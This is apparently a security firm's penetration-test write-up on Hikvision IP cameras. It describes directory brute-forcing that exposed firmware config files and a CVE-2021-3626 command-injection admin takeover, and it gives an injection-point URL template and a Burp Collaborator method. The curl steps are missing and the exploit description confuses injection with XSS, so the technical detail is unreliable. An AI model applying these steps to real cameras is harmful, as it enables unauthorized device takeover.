Exploiting Flaws on Hikvision Cameras

The Internet of Things (IoT) proliferates, and Cyber criminals are turning their attention to hacking the billions of devices that are connected to the Internet due to their vulnerable, sometimes non-existent, and ignored security.

Manufacturers may prioritize functionality and cost-efficiency over security, leading to vulnerabilities in these devices. This makes them an easy target for attackers to gain unauthorized access and control over the devices. Also, IoT devices often have firmware that is not regularly updated by manufacturers or users. This means that known vulnerabilities may go unpatched, leaving devices exposed to exploitation.

Securing IoT devices requires a thorough evaluation of the vendor, firmware, and patch management capabilities before making any investments. Understanding the reasons why security cameras can be hacked, and illustrating the impact requires a certain skill.

By sharing some of our techniques with our community, we aim to emphasize the importance of selecting providers with such expertise for your security assessments. Our intention is not to divulge secrets but to present facts that highlight the seriousness of these issues and what damage an attacker can do if those issues are ignored. 

Black Hat Ethical Hacking's objective, was to showcase the significance of going beyond the vulnerability identification which many stop there, by showcasing and providing concrete evidence of the real impact through exploitation and effective remediation strategies for the Blue Team (Defenders). Leveraging our skills gained from Bug Bounty Hunting Programs, we can perform Penetration Testing at a really more effective level specifically for the PoC (Proof of Concept) exploitation part.

In this write-up, we will dig into the security aspects of Hikvision security cameras by highlighting the findings and identified vulnerabilities, which we then exploited to demonstrate their true impact aiming to go beyond simple detection and vulnerability identification from a comprehensive penetration testing conducted by our Red Team.

Vulnerability (1): Hikvision Security Camera, Source Code Disclosure and Takeover via CMD Injection

Weakness type: 

CVE-2021-3626: Command Injection in the web server of some Hikvision products

Risk Description

We have managed to combine 2 chained successful attacks on this Hikvision IP Camera, and combined them into 1 Critical issue. 

 

Command Injection Attack:

A command injection vulnerability in the web server of some Hikvision product. Due to the insufficient input validation, an attacker can exploit the vulnerability to launch a command injection attack by sending some messages with malicious commands. 

We have managed to successfully inject a command directly into your camera's built in firmware, allowing us to reactivate the admin account, and completely take over the camera. We did not proceed with doing this, but we did reach a point where we could and included screenshots to prove it just before taking over. Basically, we performed the exploit to prove the vulnerability that was recently disclosed is valid and that no false positives were found. All done pure manually.

Source code disclosure:

After successfully brute-forcing the directory of the IP Camera without any security mechanisms blocking our attacks, we discovered all the configuration files, and scripts containing all the controls of the cameras as we will show you. 

This is due because we noticed the firmware is from 2017, and the specific version of the CVE was 2021 so this gave us the ability to understand that it was outdated and therefore proceeded with attacking the camera, based on our research to this particular CVE. 

Command injection is a critical issue, it allows executing commands as admin, directly on the camera and controlling it. 

Technical Analysis:

As you can see from here:

http://XXX/doc/page/login.asp?_1651847976739

This is the main camera Login Page, you can notice on the bottom the date says 2017:

used Burp Suite Pro and other tools to perform several Recon scans, discovering the content, bruteforcing for directories, and ended up revealing the source code of several functionalities of the camera, here are some links, to see, the rest are all uploaded in your cloud folder under camera attack. 

Links: 

Source Code Login Mechanisms, showing how and who can log in:

http://XXX/doc/i18n/en/Login.json?version=V4.0.1build170814 

Source Code Wizard Mechanisms, showing all operations of the configuration of the IP Camera:

http://XXX/doc/i18n/en/Wizard.json?version=V4.0.1build170814 

http://XXX/doc/i18n/en/Common.json?version=V4.0.1build170814

Proof of Concept (POC)

To perform the source code reveal, open a terminal in Linux, and use the below curl: 

Then this: 

 

And This:  

 

Complete Takeover, Admin Reset Via Command Injection: 

To do this, you must open Burpsuite, use Collaborator and inject the payload in this section after you generate it: 

http://XXX/doc/page/login.asp?//[INSERTPAYLOAD]/xss.js

Should allow you to popup the admin reset Password: 

 Disclaimer :

The information provided by DEVCON and anyone associated with it is intended for Educational purposes only. The techniques discussed are meant to be used responsibly, with proper consent, and authorized access. The findings do not disclose any client information or information that is sensitive, its all well edited to keep only the necessary. BHEH and its members do not accept any responsibility for the misuse or illegal use of these techniques. It is essential to abide by applicable laws, regulations, and ethical guidelines when conducting any security assessments or penetration testing activities.

Always seek proper authorization and obtain consent before performing any actions that may impact the security or privacy of systems and networks.